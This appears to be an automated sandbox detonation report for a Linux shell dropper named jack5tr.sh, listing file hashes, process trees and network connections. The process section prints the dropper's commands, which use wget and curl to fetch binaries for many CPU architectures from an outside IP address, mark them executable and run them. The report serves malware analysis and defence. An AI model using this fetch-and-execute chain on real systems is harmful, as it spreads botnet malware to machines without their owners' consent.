| MD5 | c4a3f27654d167d92ac6df60a02b40e2 |
| SHA1 | b1707a6ada4a6538e7595cbbdd2cd3b3d2294166 |
| SHA256 | 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100 |
| SHA512 | ee1fd253404678b44d026310d0ec655057602be0a83d2b9ae6e4eb0c357f74900fcaea430d8ced18d6debb8053bbdf4db39b7900b33080ce735ae87b25317f66 |
/tmp/mips
| MD5 | 038943a024bba0e623ee0fc71c0e9dc4 |
| SHA1 | daaffb7cab5f0b1973d602b1f6d8c8f35600dc0b |
| SHA256 | 28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb |
| SHA512 | 3e6c767298d62657a8217d4258bea76bbbb4abb0b85423045a2eca691399d56952abad3197f501f4bbf71eee2fc30fd017cec58171274bb6021789b597871b07 |
/tmp/arc
| MD5 | 154506d20dcd8502b3820a2912b697e9 |
| SHA1 | 55c207a1c0aeabc6df6d0307f11a03137139d701 |
| SHA256 | 5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c |
| SHA512 | aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112 |
/tmp/x86_64
| MD5 | 74eff98ceea934700653d0c0620419f8 |
| SHA1 | 037df252464667dbcdc6f4fde3ff9043a3b76909 |
| SHA256 | 7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89 |
| SHA512 | 81f6a484bf3dddfa9c0b574f207accde90b631545907eb2d15565e6ffdbbb177c5c97733090a0cac83d775007256a4ff67848fbbe95faa19adb199a312a6573c |
/tmp/mpsl
| MD5 | eba2a5a74d5beba7b9f903cfe07f9796 |
| SHA1 | 012af86b452d7e7f82bbd45b5bbef672d2b25c67 |
| SHA256 | 4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea |
| SHA512 | a35aa4ebfab6a69a76a3ea31c52ba27f8a5b306b54ed1f732f18f8ad61f1dea57ea5af0354d604cfdb6769419e0a9a44f10545c1f1a27ad018ec730b9fb480be |
/tmp/arm
| MD5 | 6b1fc0e45d31470659fe0e295bc63d4e |
| SHA1 | ce54569f5eefe03f56d5df2df3fe4830b0c9f177 |
| SHA256 | 6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22 |
| SHA512 | f3a3cc1705764a3be4e725d10ae10710d4a09750e629c8cf07974907ac88858bfa54bc86cca6947e51de468fe654669b751c48ee2e234c53f4f001b29fdb9fea |
/tmp/RUN
| MD5 | 9c1344aa17dc266ff8f8637b2becfc46 |
| SHA1 | 2dedb0abaf75446902f162dc8fc6e9b04fb9a8ee |
| SHA256 | 423e707b0c9e2d015f8f46df9053bbe469f240b7e1b5f9248f3172eecb36e4e4 |
| SHA512 | 382a31d139ee354d0078c06de83a3cce1cfe568c45b0b6b6586e954d0fc048ded37227797fe078ffcdd5539c2f70fd8338b5b6d72fb3a3e7f22230deacbb1da1 |
/tmp/arm5
| MD5 | fc7db008f770f37ccb16e8d23f9780ae |
| SHA1 | acd2865df9fec74fdafb227ce3136b715bb998b0 |
| SHA256 | 857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db |
| SHA512 | c0e126cb47cbcd469d7b8b99ae7b5cb4cb25444adb91586acf02c36d9d21f221d897d0c2ba989371ea165a436ed49320219b074e5bb10afd0b2defb4319f097c |
/tmp/arm6
| MD5 | d6227412be050807781b974181739db6 |
| SHA1 | 14d20849fc59a62ed7f713afda3d9dda4cc2c850 |
| SHA256 | e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09 |
| SHA512 | 7a58d6d56f24f1064262de862372531e4cb7967373a4253a2ddc631a195373102fbc19178393f9c568b6b977641bf7bf5b283ca11f033f93fdadfa4789bc9c76 |
/tmp/arm7
| MD5 | d0084c21e35f40b71450406d0298e622 |
| SHA1 | f2ce386f6ba9afdb7f95272ab867c913b0802cd9 |
| SHA256 | 9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f |
| SHA512 | 0f6618d607368f2251c48c9daa4d378ca89a6a053c7f5a981ad7e0d9683aa242d12f38b6f476dbbb36abd6ba2d627267cb3b9494bf3c4af40615c440be26f727 |
/tmp/ppc
| MD5 | 9b27ba0a33c0ecaf4c48bc1fdabf2538 |
| SHA1 | d568ee55ba8476a9121f9f9c6dbe4e9e18cbb266 |
| SHA256 | 6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618 |
| SHA512 | 1428b89fbf2b432783eeef4e1362c840d92072c73490bef5f6c13e14de1cb8e8260adc323bfd433992be158dfd284ba21cabba3404527638cdbcdbfabd86baea |
/tmp/spc
| MD5 | 839129f80935155dff6a2db49753d6a9 |
| SHA1 | d0f9e58eb29c5fcf88b4bbdfe7e447dd9ed9b8ba |
| SHA256 | 073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457 |
| SHA512 | ef2ce2ebb97feb7d955cae8f3f85bea2ab02b312efad8580bd7efc92684dc6cb0343c2c8f561ad8c4a9e2e40580585754d0ea214099d37c862629c5bd8b913c3 |
/tmp/m68k
| MD5 | e6391e323b334b1257f36bb2fcb34e25 |
| SHA1 | 1532d7dd78fb0b0263ee0df4ab3d007a68e45c41 |
| SHA256 | 66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728 |
| SHA512 | b4bad5f003ccec3aaa5f412ffebec85d4fd0ba12d7a53abad056fc4a8ba7392967812b886d32ce2e54d28de018a39c51980a724149ab98b7c23b589a3f631958 |
/tmp/sh4
| MD5 | f26f51b05d46bea29bcab58abb1a9ec1 |
| SHA1 | 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf |
| SHA256 | ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466 |
| SHA512 | b60304f2fb247d8a171490d88183c7b56ab9458c39dae0cbd255145c5e463f5c7d78dbcda73c04f2eb3e33cff003c061473d86bb821d60bac12353506281ccea |
Analysis: behavioral7
Detonation Overview
Submitted
2024-08-29 19:31
Reported
2024-08-29 19:36
Platform
ubuntu2004-amd64-20240611-en
Max time kernel
6s
Max time network
180s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RUN | /tmp/jack5tr.sh | N/A |
| File opened for modification | /tmp/x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/m68k | /usr/bin/curl | N/A |
Processes
/tmp/jack5tr.sh
[/tmp/jack5tr.sh]
/usr/bin/wget
[wget http://193.37.59.116/x86]
/usr/bin/curl
[curl -O http://193.37.59.116/x86]
/usr/bin/cat
[cat x86]
/usr/bin/chmod
[chmod +x config-err-YYA4jL jack5tr.sh RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mips]
/usr/bin/curl
[curl -O http://193.37.59.116/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x config-err-YYA4jL jack5tr.sh mips RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arc]
/usr/bin/curl
[curl -O http://193.37.59.116/arc]
/usr/bin/cat
[cat arc]
/usr/bin/chmod
[chmod +x arc config-err-YYA4jL jack5tr.sh mips RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/x86_64]
/usr/bin/curl
[curl -O http://193.37.59.116/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x arc config-err-YYA4jL jack5tr.sh mips RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mpsl]
/usr/bin/curl
[curl -O http://193.37.59.116/mpsl]
/usr/bin/cat
[cat mpsl]
/usr/bin/chmod
[chmod +x arc config-err-YYA4jL jack5tr.sh mips mpsl RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm]
/usr/bin/curl
[curl -O http://193.37.59.116/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x arc arm config-err-YYA4jL jack5tr.sh mips mpsl RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm5]
/usr/bin/curl
[curl -O http://193.37.59.116/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x arc arm arm5 config-err-YYA4jL jack5tr.sh mips mpsl RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm6]
/usr/bin/curl
[curl -O http://193.37.59.116/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 config-err-YYA4jL jack5tr.sh mips mpsl RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm7]
/usr/bin/curl
[curl -O http://193.37.59.116/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 config-err-YYA4jL jack5tr.sh mips mpsl RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/ppc]
/usr/bin/curl
[curl -O http://193.37.59.116/ppc]
/usr/bin/cat
[cat ppc]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 config-err-YYA4jL jack5tr.sh mips mpsl ppc RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/spc]
/usr/bin/curl
[curl -O http://193.37.59.116/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 config-err-YYA4jL jack5tr.sh mips mpsl ppc RUN snap-private-tmp spc ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/m68k]
/usr/bin/curl
[curl -O http://193.37.59.116/m68k]
/usr/bin/cat
[cat m68k]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 config-err-YYA4jL jack5tr.sh m68k mips mpsl ppc RUN snap-private-tmp spc ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/sh4]
/usr/bin/curl
[curl -O http://193.37.59.116/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 config-err-YYA4jL jack5tr.sh m68k mips mpsl ppc RUN sh4 snap-private-tmp spc ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]
/tmp/RUN
[./RUN]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| GB | 185.125.190.48:80 | connectivity-check.ubuntu.com | tcp |
Files
/tmp/x86
| MD5 | c4a3f27654d167d92ac6df60a02b40e2 |
| SHA1 | b1707a6ada4a6538e7595cbbdd2cd3b3d2294166 |
| SHA256 | 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100 |
| SHA512 | ee1fd253404678b44d026310d0ec655057602be0a83d2b9ae6e4eb0c357f74900fcaea430d8ced18d6debb8053bbdf4db39b7900b33080ce735ae87b25317f66 |
/tmp/mips
| MD5 | 038943a024bba0e623ee0fc71c0e9dc4 |
| SHA1 | daaffb7cab5f0b1973d602b1f6d8c8f35600dc0b |
| SHA256 | 28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb |
| SHA512 | 3e6c767298d62657a8217d4258bea76bbbb4abb0b85423045a2eca691399d56952abad3197f501f4bbf71eee2fc30fd017cec58171274bb6021789b597871b07 |
/tmp/arc
| MD5 | 154506d20dcd8502b3820a2912b697e9 |
| SHA1 | 55c207a1c0aeabc6df6d0307f11a03137139d701 |
| SHA256 | 5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c |
| SHA512 | aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112 |
/tmp/x86_64
| MD5 | 74eff98ceea934700653d0c0620419f8 |
| SHA1 | 037df252464667dbcdc6f4fde3ff9043a3b76909 |
| SHA256 | 7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89 |
| SHA512 | 81f6a484bf3dddfa9c0b574f207accde90b631545907eb2d15565e6ffdbbb177c5c97733090a0cac83d775007256a4ff67848fbbe95faa19adb199a312a6573c |
/tmp/mpsl
| MD5 | eba2a5a74d5beba7b9f903cfe07f9796 |
| SHA1 | 012af86b452d7e7f82bbd45b5bbef672d2b25c67 |
| SHA256 | 4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea |
| SHA512 | a35aa4ebfab6a69a76a3ea31c52ba27f8a5b306b54ed1f732f18f8ad61f1dea57ea5af0354d604cfdb6769419e0a9a44f10545c1f1a27ad018ec730b9fb480be |
/tmp/arm
| MD5 | 6b1fc0e45d31470659fe0e295bc63d4e |
| SHA1 | ce54569f5eefe03f56d5df2df3fe4830b0c9f177 |
| SHA256 | 6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22 |
| SHA512 | f3a3cc1705764a3be4e725d10ae10710d4a09750e629c8cf07974907ac88858bfa54bc86cca6947e51de468fe654669b751c48ee2e234c53f4f001b29fdb9fea |
/tmp/RUN
| MD5 | 9c1344aa17dc266ff8f8637b2becfc46 |
| SHA1 | 2dedb0abaf75446902f162dc8fc6e9b04fb9a8ee |
| SHA256 | 423e707b0c9e2d015f8f46df9053bbe469f240b7e1b5f9248f3172eecb36e4e4 |
| SHA512 | 382a31d139ee354d0078c06de83a3cce1cfe568c45b0b6b6586e954d0fc048ded37227797fe078ffcdd5539c2f70fd8338b5b6d72fb3a3e7f22230deacbb1da1 |
/tmp/arm5
| MD5 | fc7db008f770f37ccb16e8d23f9780ae |
| SHA1 | acd2865df9fec74fdafb227ce3136b715bb998b0 |
| SHA256 | 857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db |
| SHA512 | c0e126cb47cbcd469d7b8b99ae7b5cb4cb25444adb91586acf02c36d9d21f221d897d0c2ba989371ea165a436ed49320219b074e5bb10afd0b2defb4319f097c |
/tmp/arm6
| MD5 | d6227412be050807781b974181739db6 |
| SHA1 | 14d20849fc59a62ed7f713afda3d9dda4cc2c850 |
| SHA256 | e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09 |
| SHA512 | 7a58d6d56f24f1064262de862372531e4cb7967373a4253a2ddc631a195373102fbc19178393f9c568b6b977641bf7bf5b283ca11f033f93fdadfa4789bc9c76 |
/tmp/arm7
| MD5 | d0084c21e35f40b71450406d0298e622 |
| SHA1 | f2ce386f6ba9afdb7f95272ab867c913b0802cd9 |
| SHA256 | 9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f |
| SHA512 | 0f6618d607368f2251c48c9daa4d378ca89a6a053c7f5a981ad7e0d9683aa242d12f38b6f476dbbb36abd6ba2d627267cb3b9494bf3c4af40615c440be26f727 |
/tmp/ppc
| MD5 | 9b27ba0a33c0ecaf4c48bc1fdabf2538 |
| SHA1 | d568ee55ba8476a9121f9f9c6dbe4e9e18cbb266 |
| SHA256 | 6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618 |
| SHA512 | 1428b89fbf2b432783eeef4e1362c840d92072c73490bef5f6c13e14de1cb8e8260adc323bfd433992be158dfd284ba21cabba3404527638cdbcdbfabd86baea |
/tmp/spc
| MD5 | 839129f80935155dff6a2db49753d6a9 |
| SHA1 | d0f9e58eb29c5fcf88b4bbdfe7e447dd9ed9b8ba |
| SHA256 | 073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457 |
| SHA512 | ef2ce2ebb97feb7d955cae8f3f85bea2ab02b312efad8580bd7efc92684dc6cb0343c2c8f561ad8c4a9e2e40580585754d0ea214099d37c862629c5bd8b913c3 |
/tmp/m68k
| MD5 | e6391e323b334b1257f36bb2fcb34e25 |
| SHA1 | 1532d7dd78fb0b0263ee0df4ab3d007a68e45c41 |
| SHA256 | 66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728 |
| SHA512 | b4bad5f003ccec3aaa5f412ffebec85d4fd0ba12d7a53abad056fc4a8ba7392967812b886d32ce2e54d28de018a39c51980a724149ab98b7c23b589a3f631958 |
/tmp/sh4
| MD5 | f26f51b05d46bea29bcab58abb1a9ec1 |
| SHA1 | 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf |
| SHA256 | ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466 |
| SHA512 | b60304f2fb247d8a171490d88183c7b56ab9458c39dae0cbd255145c5e463f5c7d78dbcda73c04f2eb3e33cff003c061473d86bb821d60bac12353506281ccea |
Analysis: behavioral9
Detonation Overview
Submitted
2024-08-29 19:31
Reported
2024-08-29 19:36
Platform
ubuntu2404-amd64-20240729-en
Max time kernel
2s
Max time network
131s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
